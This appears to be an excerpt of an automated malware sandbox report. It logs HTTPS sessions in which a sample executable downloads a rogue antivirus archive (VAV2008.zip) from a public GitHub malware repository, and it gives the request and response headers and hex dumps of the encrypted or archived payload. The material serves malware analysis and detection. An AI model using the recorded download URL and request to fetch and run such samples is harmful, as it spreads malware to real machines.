                                                                                                                                                2022-09-29 12:52:02 UTC37054INData Raw: bf 1d 3c d1 f8 49 be 1c 21 8c 4f 76 c9 95 df 28 51 36 d0 2f 52 27 2f d5 ff 6d 64 29 e9 87 14 b1 58 6c 2b c3 25 8b ec cd 01 bb f1 be 29 a5 ea 6d 0b b9 bc 92 f8 e7 e8 94 fa 2b 55 e5 83 25 10 b1 0f 03 8e 04 37 7f 63 7d a9 9a 3e 07 e2 dd ea f4 df 1c c1 6a 83 7c 37 4a 98 61 60 b7 a0 86 e8 0d 72 f5 cf df 41 fc b0 5d 8c b7 0f 05 f5 50 a9 e0 26 e5 cb 06 a7 27 e9 83 53 dc 66 71 e9 f4 d8 73 f5 21 ab d5 e0 5c 84 5a 14 fd e5 4a bd 4a 55 56 6f 34 02 3c 37 45 d7 dc 97 e1 e3 54 d8 e4 b9 10 89 4e ec 07 22 31 2d 35 ee 0e eb 43 2a 79 ea bf 9e 88 6c 3e 9e 50 f4 c6 35 b1 94 f9 58 32 3f da 95 a5 26 5a 58 a3 11 9f 5a a8 04 1f 42 41 bb 3b cf a0 28 6f 70 fb 00 d1 57 e2 9f 4b 49 af 10 2e a1 da 02 32 38 80 a8 a6 1b a1 74 3d 41 67 6f 2a fe 16 21 a9 34 60 ca 20 33 c0 bb 32 b4 74 7b
                                                                                                                                                Data Ascii: <I!Ov(Q6/R'/md)Xl+%)m+U%7c}>j|7Ja`rA]P&'Sfqs!\ZJJUVo4<7ETN"1-5C*yl>P5X2?&ZXZBA;(opWKI.28t=Ago*!4` 32t{
                                                                                                                                                2022-09-29 12:52:02 UTC37070INData Raw: bb 5f 81 8d 58 19 20 f1 a2 4e ee 43 e1 09 3f f2 77 19 f0 f0 6f a6 53 f5 da 40 3e 97 cc 8d 1e e0 fe 52 b6 0a 2a 94 8d 76 07 17 ac 2f 28 af b6 7d a5 54 e2 c4 e7 10 88 b6 69 a8 41 14 97 27 ca ba ce 78 f3 b5 28 41 25 7f db b8 b8 6b 04 bd 09 86 dc 1d 96 d8 63 fb 4c ab 1b e3 4f 61 a6 53 72 de e6 2a 33 cf 87 cb f6 c8 1d 49 5e f0 6f b4 1b 01 63 63 4b ec 6a 90 00 a7 ed e9 d0 c5 f7 01 2e 03 9b dc 28 c9 9c a4 9c 0e dd ea 7b d2 ab 16 98 82 60 55 59 8b 0a 9c ed c3 08 7e 2e 00 a7 64 57 71 f6 5e 87 93 0d f7 59 79 5f c4 43 33 a0 ac bf 5e 30 f2 39 fa c4 34 2b ef 15 7f b7 50 6b 57 a6 e2 03 ac 50 be a6 fe b9 19 2d 72 f0 94 5d f2 04 aa cc bd 5d 37 03 29 63 db 14 b1 4f 24 5d 40 c5 3b 29 2f c0 2c ed 07 c9 81 24 d7 f5 58 19 ec 73 35 72 6b fb df 86 b6 1e e9 2b 46 89 ca 48 df f2
                                                                                                                                                Data Ascii: _X NC?woS@>R*v/(}TiA'x(A%kcLOaSr*3I^occKj.({`UY~.dWq^Yy_C3^094+PkWP-r]]7)cO$]@;)/,$Xs5rk+FH
                                                                                                                                                2022-09-29 12:52:02 UTC37086INData Raw: 87 b7 fa d7 50 3e b6 2b 72 7d 4c b4 04 04 fa 3d ea e4 b6 1b 1b 73 66 a0 db 52 fa e2 79 95 e8 9d 81 f6 81 80 67 f0 7a 4f 18 d0 d0 4f af 9c 98 84 29 1f 03 af 71 3d e6 cf 45 b8 93 b3 25 e8 8b 1f 83 4c 7e 64 70 c3 31 58 18 2f 92 f3 e4 7e 07 f2 51 ab 1a 8d 4e e2 0f ee 07 42 74 fa 13 e5 b2 ba 27 f2 93 49 55 ca fc 70 5b bd 4f 05 37 94 45 10 0e 82 7b 8a dd 99 78 24 fc 1b ec a9 82 12 95 4f 89 3f 35 f7 15 cc d7 f4 f2 a5 04 b8 6b 29 9a 5d d7 e3 29 78 85 a2 25 ba e2 83 51 fe ad 5e 79 0f 30 22 78 2f dc 68 7a 2a d2 95 2d 9f 49 47 c0 81 bf be 33 47 f2 1e 09 8e 2d 29 e2 81 bf 13 6c c4 5c ad 42 2e cd e1 64 77 1d 94 d5 30 40 b0 4a cd 8b ef f7 3e 70 98 b5 33 5a 44 f4 bd 82 2e b0 c5 a7 9c cd 0c c8 cd 35 5e 33 ea 83 db 35 00 33 93 41 45 33 fa bb f0 8b ac 17 b1 a4 9a 2d 9a 27
                                                                                                                                                Data Ascii: P>+r}L=sfRygzOO)q=E%L~dp1X/~QNBt'IUp[O7E{x$O?5k)])x%Q^y0"x/hz*-IG3G-)l\B.dw0@J>p3ZD.5^353AE3-'
                                                                                                                                                2022-09-29 12:52:02 UTC37102INData Raw: a2 c8 eb 0c 07 27 8d b2 08 80 0b 6a 6a 8e c1 44 91 59 dc ca 20 ab 72 3d de 45 7d 99 96 ea 2b 27 ca 6f cc 22 86 e8 c5 41 b3 86 75 60 2d 5a 0d 66 d2 c6 75 d7 53 9e 1e 17 12 1e 80 19 ef f9 82 05 c0 83 80 40 a1 d9 9e 28 8a 4d 92 f6 e8 b0 52 0c 64 d4 93 bd 91 af 76 35 ac 69 e0 16 ed 46 09 07 e4 17 e0 a6 e9 49 fd 19 51 9d 0c 11 e0 46 24 06 3c d3 a5 f8 f3 fb a0 bb b3 4b 20 3a 8a 35 2c 75 5f f1 9e ce 71 78 20 bc 21 47 bc 0d 2b 30 44 23 27 e2 ce 34 4c 39 30 cd 34 81 5e a4 cf f9 2d ca d2 fd d0 96 8c 18 f9 c9 f0 96 12 86 cd 35 28 9c f6 30 3d b6 a3 f2 32 02 4a 1c 90 b7 1d 70 b3 68 cc 2d da ed 54 db d9 ef 3b aa 2e 6b a6 3c bc f6 92 65 c2 a8 39 d5 cc a7 5d 07 36 1e 21 6c b5 ed 68 a5 13 07 05 69 a2 37 92 c6 d6 b3 5e 50 12 e4 64 a3 ce e9 4e 6b c2 12 64 9f c7 83 d0 69 4b
                                                                                                                                                Data Ascii: 'jjDY r=E}+'o"Au`-ZfuS@(MRdv5iFIQF$<K :5,u_qx !G+0D#'4L904^-5(0=2Jph-T;.k<e9]6!lhi7^PdNkdiK
                                                                                                                                                2022-09-29 12:52:02 UTC37118INData Raw: e8 4f 36 57 ab a8 7b 4d a8 4a 92 a4 d2 4d c3 1f 97 ad 18 d0 8e 6a e0 1b eb b9 fb 1f 37 7e 16 26 64 2e 71 06 c5 40 94 98 cf 32 2d 03 3a 3b 57 1f e9 89 af 57 0d fb 9d 42 c5 22 40 d0 df 7e c5 6a de 92 72 6e 1b 45 3a 56 be 8c cb 15 56 44 1f 10 f0 82 c6 dc 45 5e 9e 7e 26 ba d8 66 1e 2e c4 d8 d2 16 6f 5f eb e8 79 54 08 35 c0 c7 66 81 cb e9 48 c6 82 ce 16 0c bd f4 b6 b7 2f bf d1 72 1b 39 46 b6 5a 1a f4 86 11 1d 4e 8b 99 6d 23 d2 28 4b 05 dd 48 9f b9 61 5c 76 ea 87 71 37 48 d3 b6 1f 51 58 bf 96 46 a7 27 c5 41 f5 73 a5 1a 5f be d9 8e 32 db 3b 70 ec 3d be 7d eb e3 ba a8 bc 8a 02 f5 5f db db 96 d6 4b d5 2b de 94 5c 76 9f db 9a 3a 98 bf f6 cf 77 35 a8 e3 d7 58 d4 65 04 0e ae 63 ee c1 12 33 88 0c 55 74 85 ca 43 23 8f de d9 af 52 10 b2 47 ae e4 23 41 1f ca 61 96 60 b5
                                                                                                                                                Data Ascii: O6W{MJMj7~&d.q@2-:;WWB"@~jrnE:VVDE^~&f.o_yT5fH/r9FZNm#(KHa\vq7HQXF'As_2;p=}_K+\v:w5Xec3UtC#RG#Aa`
                                                                                                                                                2022-09-29 12:52:02 UTC37134INData Raw: a5 40 92 4b 56 b1 05 a4 1e 17 91 90 ce 0b 71 44 28 89 06 da f6 21 f7 c6 76 ef fb bd 0b 4f cf 96 4e 02 ce d6 b3 1f 8e 5d 3c de 10 73 26 7d ab a6 6e 7d 6c 7b 2a 9f da 7d 6e 8a 41 94 01 5e a3 e9 50 10 2f f8 99 76 2a 25 96 f6 fd 7b 53 df 59 ef 0c e4 0b 0d 25 62 ae be e8 38 29 8a 64 88 a7 31 76 9e 93 47 87 06 85 c7 37 4d 6f c8 f2 5e 8a 8e 35 b1 1e f3 53 3c 0c 81 51 a7 9d d8 5b aa 58 c7 c9 dd 31 19 88 d6 32 22 d5 ea 91 12 4c 2a 5f c9 80 19 7f 6c 61 78 26 60 ec 79 59 16 74 f7 2f 98 7e 99 3c 95 cc 3f c3 2f 1f fe 93 99 9d 3c 96 98 c7 ad 48 09 91 a9 08 dd 9a b9 5d 19 e3 68 99 25 c0 0b 9a 28 f7 48 9f a3 56 22 ba 38 f7 c1 14 39 01 0e 6c 2f 43 28 c0 8b 79 8a fd 3b 65 39 2c 75 3f 1c e7 76 82 29 fb 39 f2 9e 27 72 c9 09 6f f5 56 b8 c1 ce c0 24 10 ad 4d d4 3d 2b 12 03 b5
                                                                                                                                                Data Ascii: @KVqD(!vON]<s&}n}l{*}nA^P/v*%{SY%b8)d1vG7Mo^5S<Q[X12"L*_lax&`yYt/~<?/<H]h%(HV"89l/C(y;e9,u?v)9'roV$M=+
                                                                                                                                                2022-09-29 12:52:02 UTC37150INData Raw: 09 18 03 27 1e 0a 7c 26 c0 31 5f 29 da 02 15 ac f4 71 ad cb bd 31 c4 1a 60 78 1c 73 dd 3f 99 d7 30 55 7f ae 59 ad f4 7d 39 df e3 e9 57 56 3b aa c9 cc 89 a5 df cd 7a e5 66 50 04 39 1e cf 22 e1 a6 1e ee 41 25 b8 f8 47 38 5e ae da f9 2a db e5 1c bc aa 40 47 77 cb ab f2 3d fc 96 34 d3 8a 19 39 17 91 26 12 89 21 82 24 a5 64 fb 39 2e fa 75 4d 6b b9 0d b5 42 f1 f4 34 45 1e 17 38 5d 81 ec c4 78 b1 8b f0 ec 4e d6 93 54 ea 65 b6 ac 04 fa a8 98 38 af 21 76 25 43 19 99 2e b3 72 53 41 07 d4 21 b4 91 75 91 d8 f7 f1 45 0a 15 f5 bc 9a 92 55 1b 9d 39 9d 5f 59 f6 35 5a 92 d6 2f f6 b9 62 b3 d1 6e 78 64 95 e8 8d 3b 4c 1b 7b d3 e7 1f 5d 84 57 e3 5f 63 31 ff c2 32 b1 d7 7e b3 d2 51 5a 2f ba 9b bc 5b ea 92 2a 74 8d 0d 1b 71 ae 05 48 1f 3b b8 43 47 2c 62 a0 d7 82 d6 5b a1 f5 ed
                                                                                                                                                Data Ascii: '|&1_)q1`xs?0UY}9WV;zfP9"A%G8^*@Gw=49&!$d9.uMkB4E8]xNTe8!v%C.rSA!uEU9_Y5Z/bnxd;L{]W_c12~QZ/[*tqH;CG,b[
                                                                                                                                                2022-09-29 12:52:02 UTC37166INData Raw: 53 99 f8 ff f8 3b 8f 33 0d 75 66 75 75 50 30 91 ba 08 01 d4 d0 42 c7 a2 8f fa 9b 36 8f 47 8c f1 47 58 ef 46 a0 f2 01 34 41 15 d4 c4 57 ad fc 76 22 62 98 f8 f0 56 42 bd 8c 03 34 e2 5a 48 e2 75 bb 35 7b f2 60 9f cf e6 44 5b a1 14 da ec 89 ee de 4c e7 16 ab 8e ee 4c bf 7e 36 ae 52 a5 1d f3 f0 29 ee 9d fd 0f 25 1f 1e 8a e0 f8 b8 90 53 f3 f5 5b 06 24 3c 87 64 09 ee f8 65 82 21 a5 9a 19 ab 97 3d 3b 27 61 07 55 5f 2d eb da 05 40 7e 95 3a e9 c5 ed c3 5a 46 3b f3 c8 07 5d e8 79 a4 d8 7a df 30 16 ef 1c e8 59 de a0 5a c9 e4 71 17 63 bf 0d a1 f6 cd 68 a2 4e 8e d1 d3 ab 2a 29 26 92 98 21 70 62 55 86 d6 be c5 85 f2 ce 64 e8 7e 01 b0 8f 95 ce 8e 2a 89 50 af 1d 79 33 b3 9a f7 d0 7a d8 a7 29 69 c0 08 e0 ee 36 5a 6d 19 6a c0 03 25 15 01 4a d9 79 16 5c d6 f6 80 b3 85 b5 03
                                                                                                                                                Data Ascii: S;3ufuuP0B6GGXF4AWv"bVB4ZHu5{`D[LL~6R)%S[$<de!=;'aU_-@~:ZF;]yz0YZqchN*)&!pbUd~*Py3z)i6Zmj%Jy\
                                                                                                                                                2022-09-29 12:52:02 UTC37182INData Raw: 62 3d dc 13 9d 7e 47 ff 53 08 bd 5b c8 20 96 00 1e 02 cb 58 b9 7a a9 fb ed 36 41 86 9d be 81 1c bc 62 c1 05 75 0c 04 2e d4 0b b6 90 eb e3 6e 22 60 c5 2e 46 e9 57 a7 90 4f 5d 9c fc 52 78 07 73 7d b8 d1 b4 92 5e c1 10 af 57 2e 57 86 62 9e 79 61 ca ca 45 2a 5f 55 e9 09 ea d5 88 c5 16 b3 66 cc bb 5e dd 2b 53 30 34 c2 24 f3 f3 7d ef 4a 83 a8 4f 6d e2 d1 e2 06 fd cc f3 7d 19 81 24 3b c5 1a da 0c f5 2e c4 35 a7 11 0f 05 cb c9 90 a7 5d 12 37 39 26 d4 8c 7e 57 4d 36 a1 69 ba ec 23 6e 67 fa bd 6a 95 86 01 f9 60 7e 86 44 76 c7 5c 87 bf c2 08 2c f5 52 0f aa c8 da 9c d2 8b 95 99 08 e5 4b 97 89 9e 53 ab 65 15 47 41 b6 53 7a 3b 32 ba d5 f7 ca 8c f9 17 42 bb 29 0a fe 99 09 74 69 56 5d a2 2f 7c dc d9 dc 65 a1 8a 22 8a 1a 12 5a 8a b8 7b e0 39 9a 78 f0 ce 8d 49 5e 0c b1 1b
                                                                                                                                                Data Ascii: b=~GS[ Xz6Abu.n"`.FWO]Rxs}^W.WbyaE*_Uf^+S04$}JOm}$;.5]79&~WM6i#ngj`~Dv\,RKSeGASz;2B)tiV]/|e"Z{9xI^
                                                                                                                                                2022-09-29 12:52:02 UTC37198INData Raw: bb 93 b6 3c 46 24 e5 34 c9 86 9b ee 04 cb ad 75 09 5a 32 4d 33 f1 6a 55 52 20 c0 1c 71 68 e2 ce bb 16 de 9e 74 84 9a 7b 98 4f 71 26 85 cf 36 38 65 eb f7 56 d9 66 40 e2 87 03 f2 32 63 d0 99 40 dc 92 a9 8b 3e 41 73 6c 09 09 1a 16 6a 02 b8 0f 95 68 43 a3 e2 a1 40 cc 10 ad 90 f2 7d d6 f4 d3 a7 e8 d1 e8 7b 42 76 63 47 0f 43 c1 fe 51 b6 c8 f7 b9 c8 1c 69 0a bd 1f da 57 74 6b a9 ec 77 97 eb 79 84 40 5f c1 d7 e9 7f e5 38 bd 98 a5 29 66 ff f8 f7 59 31 13 27 d7 90 b3 38 73 80 c6 d2 ce 7c 7a 8b c9 34 ee 58 f1 62 ed ca 41 b5 ce 88 3b ef fe f1 54 b5 62 d8 39 24 67 47 b0 3a f8 1c 44 4f 90 76 46 43 97 ba 22 80 4c 1e 5c d1 aa cc e7 43 68 23 58 a5 7d b9 b8 7a 49 68 95 e3 bf 0b 56 c4 aa 47 72 6a b1 8b 7b 50 c3 a9 e9 48 7d 52 91 99 e5 13 84 c2 ae 0d ec 95 9a 88 c8 5b d2 5e
                                                                                                                                                Data Ascii: <F$4uZ2M3jUR qht{Oq&68eVf@2c@>AsljhC@}{BvcGCQiWtkwy@_8)fY1'8s|z4XbA;Tb9$gG:DOvFC"L\Ch#X}zIhVGrj{PH}R[^


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                66192.168.2.549767140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:52:03 UTC37207OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:52:03 UTC37207INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:52:03 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/VAV2008.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:52:03 UTC37208INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                67192.168.2.549768185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:52:03 UTC37210OUTGET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:52:03 UTC37210INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 784070
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "5601906f462292c534f39537ca64d8cda4306ae676428837f668f0e7370b064a"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: F256:3F37:F623C5:105CF59:6335936B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:52:03 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6958-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455924.709360,VS0,VE188
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 26082df3fd5b2b43de47172c7d06b8e8544cec28
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:57:03 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:52:03 UTC37210INData Raw: 50 4b 03 04 33 00 01 00 63 00 73 14 a7 3a 00 00 00 00 fe f5 0b 00 73 0b 0c 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 56 41 56 32 30 30 38 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 2c e5 a7 6a 4d 02 19 ad e4 db 0e 60 f4 6e 12 95 d3 5b c6 37 07 fe 19 c6 cd ed c5 04 33 33 cc 8b 59 b9 2d 06 87 fe ef 3f 78 19 73 6f b0 58 5f 9b 21 73 23 37 6c 4e bc 8a 2a 2e 5a 98 e7 35 af cb 0d 36 49 ad 79 e7 76 4f d1 96 71 3e dd 31 11 19 b5 e2 b9 3e eb 4a fe 8f 12 67 d4 dd 67 1f e7 5b 88 8d b1 6f 1a e5 98 1f a4 62 72 90 26 00 0e 23 11 04 d9 27 6b 03 55 90 a9 62 bc a9 56 7e 57 9d 32 c3 0c ad 21 ca 9c bc 78 2c 09 c1 ff dd 21 1c af 38 bc 08 35 2c 7f a0 be fb 67 0f 77 5b ab 29 fb 3e c7 b3 02 35 98 0e 2d 5d 33 2b e1 8c fa f4 1b 04 2e 38 43 0b 17 be a4 b0 ac 12 f4 53 04 be
                                                                                                                                                Data Ascii: PK3cs:sEndermanch@VAV2008.exeAE,jM`n[733Y-?xsoX_!s#7lN*.Z56IyvOq>1>Jgg[obr&#'kUbV~W2!x,!85,gw[)>5-]3+.8CS
                                                                                                                                                2022-09-29 12:52:03 UTC37226INData Raw: 8b 60 b0 0b a2 8c f5 c9 6e e0 e7 58 6f 3d 56 b0 5b 5a c7 1d 1f 55 4e 19 e3 2f 80 7e 0b 0a 35 bc 10 07 6b 20 88 96 5d 69 4f 1f 06 af 2d 5a 04 e6 45 93 45 c6 06 94 96 3d c9 4f e0 28 e0 bd d5 bb 8a 7e 5f d8 1e 80 2a 43 6b cf a3 11 5c 60 a5 8f 78 09 c2 cf a3 24 59 5f 6f d9 12 48 d6 e7 79 e2 dc 61 29 b2 25 f3 ed 62 68 0b a8 57 5c 6a c8 59 8e 54 9e e7 ff d6 f3 80 78 6c 83 2d e4 67 b7 6f eb c3 d7 7d 29 c1 0d 37 cd 40 c1 9a 6f 0b c6 0b 0c 18 f8 f2 52 57 a1 02 ac a5 d6 4a 5f c8 c1 a3 6f 85 93 b3 c0 38 ec 68 dd 80 1d 95 e6 b8 ce 38 c0 ae ba f1 5a 69 18 80 df 94 4a 29 c0 7b 86 ad 95 06 3c 63 cb cd 7d eb 18 c4 13 6c 91 88 45 cf 95 dd 5c d6 1f 13 a2 44 3a a0 67 f2 53 08 8b b3 8f 58 d1 91 e9 86 e7 63 8b 69 e9 3d f7 67 3a cd 09 59 16 ae fd 12 c3 13 be 19 3c 37 59 80 e6
                                                                                                                                                Data Ascii: `nXo=V[ZUN/~5k ]iO-ZEE=O(~_*Ck\`x$Y_oHya)%bhW\jYTxl-go})7@oRWJ_o8h8ZiJ){<c}lE\D:gSXci=g:Y<7Y
                                                                                                                                                2022-09-29 12:52:03 UTC37242INData Raw: 1c 5d 4c ce d0 b2 32 61 fa b2 f7 59 42 2d e9 9f 46 fb 36 44 84 9c f9 24 5f 30 80 e8 c2 08 6a 28 2e fb 84 09 58 e0 f5 5e 1e e0 5f 08 8c 9d 09 ed 77 c7 84 9f 3c 32 e1 c0 8c af cd 84 bf b5 bb dc ac dd 6c a1 31 b8 a4 be 6c 08 05 a1 9e 14 16 69 bd 27 57 20 e8 3d 7d c4 ea 95 83 71 6d 36 52 ac 50 02 40 6a b6 fb 44 17 de 0c 18 dd d7 5a 04 98 1c 0c d4 d4 96 e6 75 b6 a5 fb 07 5b 83 9f 6f d0 cf 94 4f aa 80 c5 55 bd 12 fb 72 ea b8 0c 10 79 7e 38 e1 f4 21 4e 49 bd 82 7a 4d f7 be 59 38 79 c5 8d f2 e6 f5 54 7b fb 40 64 3c 34 d8 c7 e5 4e 98 cc 29 cf 27 cf d8 3d 1c 2e 6e 6a 05 d7 88 eb e0 ee aa 65 86 5a fd 5f 3d e9 fa 11 60 0d 7d 71 63 3d f9 43 ac 4c 03 13 4f 43 7c b8 9f 0d eb 30 5b 37 f0 8d d8 e0 39 84 c5 97 30 46 2a 20 ff 88 c9 c2 c1 e2 f9 0b 05 21 64 a9 e4 b8 c6 1f 9f
                                                                                                                                                Data Ascii: ]L2aYB-F6D$_0j(.X^_w<2l1li'W =}qm6RP@jDZu[oOUry~8!NIzMY8yT{@d<4N)'=.njeZ_=`}qc=CLOC|0[790F* !d
                                                                                                                                                2022-09-29 12:52:03 UTC37258INData Raw: 1e 9f 6b 28 b3 ac f6 d6 3a 85 09 44 f9 37 d1 b2 3a 86 4f 95 75 99 e4 f3 7b 05 1f dc fc ed cc da 62 1f 82 ab c1 7b eb a8 a9 2e ba ad 46 16 8d b0 cb d0 ec 40 2f c4 b2 80 f1 56 09 26 52 e2 cd e8 1d cf d2 c6 8a 24 ad 32 a5 4a cf 91 56 11 fb 9a 7c 3b 7d 3c 0f d1 ce c4 0b 66 6a f4 1d 72 27 5a 12 11 a0 2c 9f 8c 8c 27 2d d7 f1 39 74 61 91 22 4d 7e 48 21 33 8a 43 01 2c d7 9c 8b c1 92 2a 14 60 49 4f 81 32 a3 f1 89 36 05 f1 0d fc c4 7b 34 32 7e 95 c2 d5 7a c6 cf c7 b3 41 d2 66 d8 af db ab 73 46 96 cc 70 ea 66 a5 1d 8f f0 87 8e 41 e3 4e 63 da 04 0c cf 26 d3 a5 13 42 a6 78 11 79 9a e6 8c 6f 1b a1 af e4 4e 0b 56 62 08 fb fd ba 93 15 45 b9 53 1e 80 93 ec ee f7 59 36 cf b2 50 e7 34 29 70 3e 60 1f b9 d7 64 5b c0 6f 21 0c e6 42 c0 37 f8 6d bd e1 b8 f2 cc 8e ae ff a5 03 62
                                                                                                                                                Data Ascii: k(:D7:Ou{b{.F@/V&R$2JV|;}<fjr'Z,'-9ta"M~H!3C,*`IO26{42~zAfsFpfANc&BxyoNVbESY6P4)p>`d[o!B7mb
                                                                                                                                                2022-09-29 12:52:03 UTC37274INData Raw: 4b c3 a7 08 f6 f2 82 2b 59 55 b4 86 3d b3 83 51 5b fd 2b 74 d4 ec f1 ef 76 03 24 de 4c 59 88 08 47 26 0c 3a 78 f6 f2 b2 eb 6d d8 6f b8 63 dc a2 80 84 76 be e0 c6 65 07 59 dd eb 74 bb 05 2c 6a b9 3b 63 f5 d6 88 66 48 42 f7 ff b8 ff a6 13 42 7b 81 16 7d 60 3c c2 b7 4e ac 83 25 31 28 1a 5c 6d d3 e2 fa 62 d0 e2 ea 30 23 dd 25 57 a7 33 8d a2 7b 87 b6 95 17 8d 38 2d ef 9f ef 79 70 73 b6 a3 c9 ee 3e 95 5e d4 b6 40 a2 f3 08 c1 39 80 4a 18 49 55 9f 2e e6 9f 61 b2 5a 77 46 34 84 c3 1d bc 69 36 b3 af b1 89 b8 3e fb d4 9b 66 f4 ec b9 93 91 f1 e8 15 04 30 2b 57 19 25 35 f5 b3 67 f6 9b e4 c8 2e 0f f7 31 b6 1a de f4 6d 86 49 40 f3 0f a4 d8 3f 0d 2b dc 59 42 8d aa ea 8a 7a a0 6b 1d 52 e5 7e 65 70 27 63 3f 49 59 b5 34 19 74 e7 70 56 ee cc da da 6c d1 b0 91 d1 a0 5f eb ba
                                                                                                                                                Data Ascii: K+YU=Q[+tv$LYG&:xmocveYt,j;cfHBB{}`<N%1(\mb0#%W3{8-yps>^@9JIU.aZwF4i6>f0+W%5g.1mI@?+YBzkR~ep'c?IY4tpVl_
                                                                                                                                                2022-09-29 12:52:03 UTC37290INData Raw: 8f ce a5 3d 8b d2 bb 94 24 be 57 fb a0 3e c9 99 9b 6c 81 50 d6 14 7c 58 ea cd 01 68 bd d7 81 c5 70 25 3e b9 b4 f1 44 a3 ce a0 96 39 ab fb cd b8 7a 4d 62 85 81 38 1c 9d 2c 42 81 88 14 a1 44 e9 e4 78 55 df b3 7c 22 7c 0d f6 d9 3a 3a 03 4e d5 70 fc 31 ec 07 e9 82 3b 5b ea 83 53 db be cb 79 19 ea fa db c4 66 11 7e 20 aa 14 4d e1 fb 41 7b 77 b0 6a 47 3c 56 fe bf 16 5a 9e 2c 1c 34 7e 92 5d c1 9c 9e 85 83 d8 2c 87 90 59 43 3f 08 a5 bd 86 6f ac 83 61 d6 c9 a6 6a 8b b8 f4 eb b8 1f 1c 27 9b 1e 10 7f 56 9e ce 0d 07 b6 0d b4 fa 2c 09 da 97 e4 e5 8d 71 b2 47 e3 08 7d 04 a8 08 a8 f3 79 b0 de 47 04 48 be 86 ee a8 de 78 f9 50 25 35 f4 53 27 82 74 4d 4d e4 14 22 1a af 94 a4 6e 09 58 fa 37 9f 6c c2 3e ee 11 a2 c4 ce 9d ce 4b f9 41 32 28 b6 e6 60 26 5f ba 3b a0 ef 14 8d 6b
                                                                                                                                                Data Ascii: =$W>lP|Xhp%>D9zMb8,BDxU|"|::Np1;[Syf~ MA{wjG<VZ,4~],YC?oaj'V,qG}yGHxP%5S'tMM"nX7l>KA2(`&_;k
